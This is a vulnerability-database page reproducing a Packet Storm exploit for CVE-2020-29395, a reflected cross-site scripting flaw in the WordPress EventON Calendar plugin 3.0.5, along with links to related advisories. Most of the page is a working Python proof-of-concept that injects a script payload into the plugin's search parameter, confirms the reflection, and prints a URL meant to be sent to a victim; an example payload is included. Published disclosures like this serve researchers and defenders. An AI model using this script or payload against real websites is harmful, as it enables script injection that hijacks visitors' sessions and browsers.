Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormB3KC4TPACKETSTORM:160282
HistoryDec 01, 2020 - 12:00 a.m.

WordPress EventON Calendar 3.0.5 Cross Site Scripting

2020-12-0100:00:00
B3KC4T
packetstormsecurity.com
388
wordpress eventon calendar
xss
cross-site scripting
vulnerability
javascript injection
security
exploit
cve 2020-29395

EPSS

0.076

Percentile

94.3%

JSON
`# Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting  
# Date: 27.11.2020  
# Exploit Author: b3kc4t (Mustafa GUNDOGDU)  
# Vendor Homepage: https://www.myeventon.com/  
# Version: 3.0.5  
# Tested on: Ubuntu 18.04  
# CVE : 2020-29395  
# Description Link:  
https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS  
  
"""  
~ VULNERABLITY DETAILS ~  
  
https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>  
  
#  
WordPress sites that use EventOn Calendar cause reflected xss vulnerability to javascript payloads injected   
into the search field.  
  
#  
The following python code will inject javascript code and print out url that will be sent to victim.   
If you use unicode caracters for xss , exploit will print page source.  
  
##USAGE##  
  
$ sudo python eventon_exploit.py --exploit --url https://target/addons/?q= --payload '<svg/onload=alert(/b3kc4t/)>'  
  
##OUTPUT##  
  
[+] https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>  
  
  
"""  
import requests  
import sys  
import argparse  
from colorama import Fore  
  
def vuln_reflected(url, payload):  
  
s = requests.Session()  
get_request = s.get(url+payload)  
  
if get_request.status_code == 500:  
print(Fore.GREEN+"[-] COULD BE WAF, NOT BE REALIZED XSS INJECTION [-]")  
  
else:  
content_result = str(get_request.content)  
search_find = content_result.find(payload)  
  
if search_find != -1:  
print(Fore.GREEN+"[+] "+str(url)+str(payload))  
  
else:  
  
print(content_result)  
  
  
def main():  
  
desc = "Wordpress EventON Calendar Plugin XSS"  
parser = argparse.ArgumentParser(description=desc)  
exp_option = parser.add_argument_group('')  
parser.add_argument("--exploit", help ="", action='store_true')  
parser.add_argument("--url",help="", type=str, required=False)  
parser.add_argument("--payload",help="",type=str,required=False)  
  
args = parser.parse_args()  
  
if args.exploit:  
  
if args.url:  
  
if args.payload:  
url = args.url  
payload = args.payload  
vuln_reflected(url, payload)  
  
if name == 'main':  
main()  
  
`

Related

prion 1
exploitdb 1
nvd 1
patchstack 1
cve 1
cvelist 1
nuclei 1
prion
prion
Design/Logic Flaw
2020-11-30 20:15:00
exploitdb
exploitdb
Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
2020-12-01 00:00:00
nvd
nvd
CVE-2020-29395
2020-11-30 20:15:11
patchstack
patchstack
WordPress eventON premium plugin <= 3.0.5 - Cross-Site Scripting (XSS) vulnerability
2020-12-01 00:00:00
cve
cve
CVE-2020-29395
2020-11-30 20:15:11
cvelist
cvelist
CVE-2020-29395
2020-11-30 19:05:03
nuclei
nuclei
Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting
2021-07-11 00:58:31

EPSS

0.076

Percentile

94.3%

JSON
Related for PACKETSTORM:160282
prion1exploitdb1nvd1patchstack1cve1cvelist1nuclei1